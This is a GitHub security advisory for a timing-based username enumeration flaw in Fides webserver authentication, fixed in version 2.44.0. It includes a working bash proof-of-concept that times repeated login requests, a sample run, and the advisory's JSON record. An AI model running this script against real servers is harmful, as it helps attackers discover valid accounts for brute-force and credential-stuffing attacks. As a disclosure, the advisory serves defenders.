ghsa-2h46-8gf5-fmxv
Vulnerability from github
Published
2024-09-04 18:03
Modified
2024-09-04 18:03
Summary
Timing-Based Username Enumeration Vulnerability in Fides Webserver Authentication
Details

A timing-based username enumeration vulnerability has been identified in Fides Webserver authentication. This vulnerability allows an unauthenticated attacker to determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. The discrepancy in response times between valid and invalid usernames can be leveraged to enumerate users on the system.

Impact

This vulnerability enables a timing-based username enumeration attack. An attacker can systematically guess and verify which usernames are valid by measuring the server's response time to authentication requests. This information can be used to conduct further attacks on authentication such as password brute-forcing and credential stuffing.

Patches

The vulnerability has been patched in Fides version 2.44.0. Users are advised to upgrade to this version or later to secure their systems against this threat.

Workarounds

There are no workarounds.

Proof of Concept

  1. Create a valid user called valid_user on a remote Fides server. Ensure that there is no user on the server named invalid_user. Note that this vulnerability is not reproducible on a local deployment due to the extremely low latency of responses to login requests.
  2. In a terminal run export LOGIN_URL='https://example.com/api/v1/login', replacing example.com with your remote Fides server's domain or IP address.
  3. In the same terminal run exploit-poc.sh (detailed below).
  4. It's possible to distinguish between valid and invalid users based on the low latency (time difference) for invalid users.
Exploit PoC script ```bash #!/bin/bash # Function to test login and calculate average transfer times test_login(){ echo -e "\nTesting login for user: $1\n" total_diff=0 for (( i=1; i <= 20; ++i )) do echo -n "Attempt #$i: " resp=$(curl -w @- "$LOGIN_URL" \ -H 'content-type: application/json' \ --data-raw '{"username":"'$1'","password":"d3JvbmdwYXNzd29yZA=="}' \ -o /dev/null -s <<'EOF' { "pretransfer": %{time_pretransfer}, "starttransfer": %{time_starttransfer} } EOF ) pre=$(echo $resp | jq '.pretransfer') start=$(echo $resp | jq '.starttransfer') diff=$(echo "$start - $pre" | bc) # Accumulate total diff total_diff=$(echo "$total_diff + $diff" | bc) # Print the result of this iteration printf "Pretransfer: %.4f, Starttransfer: %.4f, Diff: %.4f\n" "$pre" "$start" "$diff" done # Calculate average diff avg_diff=$(echo "scale=4; $total_diff / 20" | bc) # Print average time echo -e "\nAverage Time Difference for $1: $avg_diff seconds\n" } # Ensure that LOGIN_URL is set if [ -z "$LOGIN_URL" ]; then echo "Error: LOGIN_URL environment variable is not set." exit 1 fi # Test valid and invalid users test_login valid_user test_login invalid_user ``` Sample script run ``` ~ ❯ ./exploit-poc.sh Testing login for user: valid_user Attempt #1: Pretransfer: 0.3006, Starttransfer: 0.7404, Diff: 0.4398 Attempt #2: Pretransfer: 0.2755, Starttransfer: 1.2506, Diff: 0.9751 Attempt #3: Pretransfer: 0.2595, Starttransfer: 0.7108, Diff: 0.4512 Attempt #4: Pretransfer: 0.2551, Starttransfer: 1.0483, Diff: 0.7932 Attempt #5: Pretransfer: 0.2553, Starttransfer: 0.6680, Diff: 0.4127 Attempt #6: Pretransfer: 0.2599, Starttransfer: 0.6712, Diff: 0.4113 Attempt #7: Pretransfer: 0.2518, Starttransfer: 0.6603, Diff: 0.4085 Attempt #8: Pretransfer: 0.2467, Starttransfer: 0.6812, Diff: 0.4344 Attempt #9: Pretransfer: 0.2502, Starttransfer: 0.8175, Diff: 0.5673 Attempt #10: Pretransfer: 0.2583, Starttransfer: 0.6904, Diff: 0.4321 Attempt #11: Pretransfer: 0.2573, Starttransfer: 0.6601, Diff: 0.4029 Attempt #12: Pretransfer: 0.2481, Starttransfer: 0.8495, Diff: 0.6014 Attempt #13: Pretransfer: 0.2487, Starttransfer: 0.6822, Diff: 0.4336 Attempt #14: Pretransfer: 0.2526, Starttransfer: 0.9728, Diff: 0.7201 Attempt #15: Pretransfer: 0.2573, Starttransfer: 0.9808, Diff: 0.7235 Attempt #16: Pretransfer: 0.2459, Starttransfer: 0.6536, Diff: 0.4078 Attempt #17: Pretransfer: 0.2508, Starttransfer: 0.9024, Diff: 0.6517 Attempt #18: Pretransfer: 0.2477, Starttransfer: 2.2049, Diff: 1.9572 Attempt #19: Pretransfer: 0.2523, Starttransfer: 2.1087, Diff: 1.8564 Attempt #20: Pretransfer: 0.2523, Starttransfer: 0.7308, Diff: 0.4785 Average Time Difference for valid_user: .6779 seconds Testing login for user: invalid_user Attempt #1: Pretransfer: 0.2496, Starttransfer: 0.4122, Diff: 0.1626 Attempt #2: Pretransfer: 0.2551, Starttransfer: 0.4049, Diff: 0.1498 Attempt #3: Pretransfer: 0.2480, Starttransfer: 0.6174, Diff: 0.3694 Attempt #4: Pretransfer: 0.2489, Starttransfer: 0.4611, Diff: 0.2122 Attempt #5: Pretransfer: 0.2513, Starttransfer: 0.4601, Diff: 0.2088 Attempt #6: Pretransfer: 0.2540, Starttransfer: 0.3946, Diff: 0.1406 Attempt #7: Pretransfer: 0.2504, Starttransfer: 0.9104, Diff: 0.6599 Attempt #8: Pretransfer: 0.2577, Starttransfer: 0.4095, Diff: 0.1518 Attempt #9: Pretransfer: 0.2497, Starttransfer: 0.3851, Diff: 0.1353 Attempt #10: Pretransfer: 0.2548, Starttransfer: 0.4024, Diff: 0.1476 Attempt #11: Pretransfer: 0.2559, Starttransfer: 0.4002, Diff: 0.1443 Attempt #12: Pretransfer: 0.2501, Starttransfer: 0.4075, Diff: 0.1573 Attempt #13: Pretransfer: 0.2560, Starttransfer: 0.3921, Diff: 0.1361 Attempt #14: Pretransfer: 0.2493, Starttransfer: 0.3933, Diff: 0.1440 Attempt #15: Pretransfer: 0.2493, Starttransfer: 0.3942, Diff: 0.1449 Attempt #16: Pretransfer: 0.2599, Starttransfer: 0.5111, Diff: 0.2512 Attempt #17: Pretransfer: 0.2455, Starttransfer: 0.4128, Diff: 0.1673 Attempt #18: Pretransfer: 0.2558, Starttransfer: 1.7535, Diff: 1.4977 Attempt #19: Pretransfer: 0.2515, Starttransfer: 1.4528, Diff: 1.2013 Attempt #20: Pretransfer: 0.2483, Starttransfer: 0.3893, Diff: 0.1410 Average Time Difference for invalid_user: .3161 seconds ~ ❯ ```

Severity

This vulnerability has been assigned a severity of LOW.

Using CVSS v3.1 it could be scored asAV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N (5.3 Medium/Moderate) or AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N (0.0 None) depending on the Confidentiality impact metric used.

In Bugcrowd's vulnerability rating taxonomy it most likely be assigned a technical severity of P4 (Low) Broken Access Control (BAC) > Username/Email Enumeration > Non-Brute Force.

Show details on source website

To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "ethyca-fides"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.44.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-45052"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-208"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-09-04T18:03:26Z",
    "nvd_published_at": null,
    "severity": "LOW"
  },
  "details": "A timing-based username enumeration vulnerability has been identified in Fides Webserver authentication. This vulnerability allows an unauthenticated attacker to determine the existence of valid usernames by analyzing the time it takes for the server to respond to login requests. The discrepancy in response times between valid and invalid usernames can be leveraged to enumerate users on the system.\n\n### Impact\nThis vulnerability enables a timing-based username enumeration attack. An attacker can systematically guess and verify which usernames are valid by measuring the server\u0027s response time to authentication requests. This information can be used to conduct further attacks on authentication such as password brute-forcing and credential stuffing.\n\n### Patches\nThe vulnerability has been patched in Fides version `2.44.0`. Users are advised to upgrade to this version or later to secure their systems against this threat.\n\n### Workarounds\nThere are no workarounds.\n\n\n### Proof of Concept\n\n1. Create a valid user called `valid_user` on a remote Fides server. Ensure that there is no user on the server named `invalid_user`. Note that this vulnerability is not reproducible on a local deployment due to the extremely low latency of responses to login requests.\n2. In a terminal run `export LOGIN_URL=\u0027https://example.com/api/v1/login\u0027`, replacing `example.com` with your remote Fides server\u0027s domain or IP address.\n3. In the same terminal run `exploit-poc.sh` (detailed below).\n4. It\u0027s possible to distinguish between valid and invalid users based on the low latency (time difference) for invalid users.  \n\n\n\u003cdetails\u003e\n\u003csummary\u003eExploit PoC script\u003c/summary\u003e\n\n```bash\n#!/bin/bash\n\n# Function to test login and calculate average transfer times\ntest_login(){\n  echo -e \"\\nTesting login for user: $1\\n\"\n  total_diff=0\n\n  for (( i=1; i \u003c= 20; ++i ))\n  do\n    echo -n \"Attempt #$i: \"\n    resp=$(curl -w @- \"$LOGIN_URL\" \\\n      -H \u0027content-type: application/json\u0027 \\\n      --data-raw \u0027{\"username\":\"\u0027$1\u0027\",\"password\":\"d3JvbmdwYXNzd29yZA==\"}\u0027 \\\n      -o /dev/null -s \u003c\u003c\u0027EOF\u0027\n      {\n        \"pretransfer\":  %{time_pretransfer},\n        \"starttransfer\": %{time_starttransfer}\n      }\nEOF\n    )\n    \n    pre=$(echo $resp | jq \u0027.pretransfer\u0027)\n    start=$(echo $resp | jq \u0027.starttransfer\u0027)\n    diff=$(echo \"$start - $pre\" | bc)\n\n    # Accumulate total diff\n    total_diff=$(echo \"$total_diff + $diff\" | bc)\n    \n    # Print the result of this iteration\n    printf \"Pretransfer: %.4f, Starttransfer: %.4f, Diff: %.4f\\n\" \"$pre\" \"$start\" \"$diff\"\n  done\n  \n  # Calculate average diff\n  avg_diff=$(echo \"scale=4; $total_diff / 20\" | bc)\n  \n  # Print average time\n  echo -e \"\\nAverage Time Difference for $1: $avg_diff seconds\\n\"\n}\n\n# Ensure that LOGIN_URL is set\nif [ -z \"$LOGIN_URL\" ]; then\n  echo \"Error: LOGIN_URL environment variable is not set.\"\n  exit 1\nfi\n\n# Test valid and invalid users\ntest_login valid_user \ntest_login invalid_user\n```\n\n\u003c/details\u003e\n\n\n\u003cdetails\u003e\n\u003csummary\u003eSample script run\u003c/summary\u003e\n\n\n```\n~ \u276f ./exploit-poc.sh\n\nTesting login for user: valid_user\n\nAttempt #1: Pretransfer: 0.3006, Starttransfer: 0.7404, Diff: 0.4398\nAttempt #2: Pretransfer: 0.2755, Starttransfer: 1.2506, Diff: 0.9751\nAttempt #3: Pretransfer: 0.2595, Starttransfer: 0.7108, Diff: 0.4512\nAttempt #4: Pretransfer: 0.2551, Starttransfer: 1.0483, Diff: 0.7932\nAttempt #5: Pretransfer: 0.2553, Starttransfer: 0.6680, Diff: 0.4127\nAttempt #6: Pretransfer: 0.2599, Starttransfer: 0.6712, Diff: 0.4113\nAttempt #7: Pretransfer: 0.2518, Starttransfer: 0.6603, Diff: 0.4085\nAttempt #8: Pretransfer: 0.2467, Starttransfer: 0.6812, Diff: 0.4344\nAttempt #9: Pretransfer: 0.2502, Starttransfer: 0.8175, Diff: 0.5673\nAttempt #10: Pretransfer: 0.2583, Starttransfer: 0.6904, Diff: 0.4321\nAttempt #11: Pretransfer: 0.2573, Starttransfer: 0.6601, Diff: 0.4029\nAttempt #12: Pretransfer: 0.2481, Starttransfer: 0.8495, Diff: 0.6014\nAttempt #13: Pretransfer: 0.2487, Starttransfer: 0.6822, Diff: 0.4336\nAttempt #14: Pretransfer: 0.2526, Starttransfer: 0.9728, Diff: 0.7201\nAttempt #15: Pretransfer: 0.2573, Starttransfer: 0.9808, Diff: 0.7235\nAttempt #16: Pretransfer: 0.2459, Starttransfer: 0.6536, Diff: 0.4078\nAttempt #17: Pretransfer: 0.2508, Starttransfer: 0.9024, Diff: 0.6517\nAttempt #18: Pretransfer: 0.2477, Starttransfer: 2.2049, Diff: 1.9572\nAttempt #19: Pretransfer: 0.2523, Starttransfer: 2.1087, Diff: 1.8564\nAttempt #20: Pretransfer: 0.2523, Starttransfer: 0.7308, Diff: 0.4785\n\nAverage Time Difference for valid_user: .6779 seconds\n\n\nTesting login for user: invalid_user\n\nAttempt #1: Pretransfer: 0.2496, Starttransfer: 0.4122, Diff: 0.1626\nAttempt #2: Pretransfer: 0.2551, Starttransfer: 0.4049, Diff: 0.1498\nAttempt #3: Pretransfer: 0.2480, Starttransfer: 0.6174, Diff: 0.3694\nAttempt #4: Pretransfer: 0.2489, Starttransfer: 0.4611, Diff: 0.2122\nAttempt #5: Pretransfer: 0.2513, Starttransfer: 0.4601, Diff: 0.2088\nAttempt #6: Pretransfer: 0.2540, Starttransfer: 0.3946, Diff: 0.1406\nAttempt #7: Pretransfer: 0.2504, Starttransfer: 0.9104, Diff: 0.6599\nAttempt #8: Pretransfer: 0.2577, Starttransfer: 0.4095, Diff: 0.1518\nAttempt #9: Pretransfer: 0.2497, Starttransfer: 0.3851, Diff: 0.1353\nAttempt #10: Pretransfer: 0.2548, Starttransfer: 0.4024, Diff: 0.1476\nAttempt #11: Pretransfer: 0.2559, Starttransfer: 0.4002, Diff: 0.1443\nAttempt #12: Pretransfer: 0.2501, Starttransfer: 0.4075, Diff: 0.1573\nAttempt #13: Pretransfer: 0.2560, Starttransfer: 0.3921, Diff: 0.1361\nAttempt #14: Pretransfer: 0.2493, Starttransfer: 0.3933, Diff: 0.1440\nAttempt #15: Pretransfer: 0.2493, Starttransfer: 0.3942, Diff: 0.1449\nAttempt #16: Pretransfer: 0.2599, Starttransfer: 0.5111, Diff: 0.2512\nAttempt #17: Pretransfer: 0.2455, Starttransfer: 0.4128, Diff: 0.1673\nAttempt #18: Pretransfer: 0.2558, Starttransfer: 1.7535, Diff: 1.4977\nAttempt #19: Pretransfer: 0.2515, Starttransfer: 1.4528, Diff: 1.2013\nAttempt #20: Pretransfer: 0.2483, Starttransfer: 0.3893, Diff: 0.1410\n\nAverage Time Difference for invalid_user: .3161 seconds\n\n~ \u276f\n```\n\u003c/details\u003e\n\n### Severity\n\nThis vulnerability has been assigned a severity of LOW.\n\nUsing CVSS v3.1 it could be scored as`AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N` (5.3 Medium/Moderate) or `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N` (0.0 None) depending on the Confidentiality impact metric used.\n\nIn [Bugcrowd\u0027s vulnerability rating taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy) it most likely be assigned a technical severity of P4 (Low) Broken Access Control (BAC) \u003e Username/Email Enumeration \u003e Non-Brute Force.",
  "id": "GHSA-2h46-8gf5-fmxv",
  "modified": "2024-09-04T18:03:26Z",
  "published": "2024-09-04T18:03:26Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ethyca/fides/security/advisories/GHSA-2h46-8gf5-fmxv"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ethyca/fides"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [],
  "summary": "Timing-Based Username Enumeration Vulnerability in Fides Webserver Authentication"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
  • Confirmed: The vulnerability is confirmed from an analyst perspective.
  • Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
  • Patched: This vulnerability was successfully patched by the user reporting the sighting.
  • Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
  • Not confirmed: The user expresses doubt about the veracity of the vulnerability.
  • Not patched: This vulnerability was not successfully patched by the user reporting the sighting.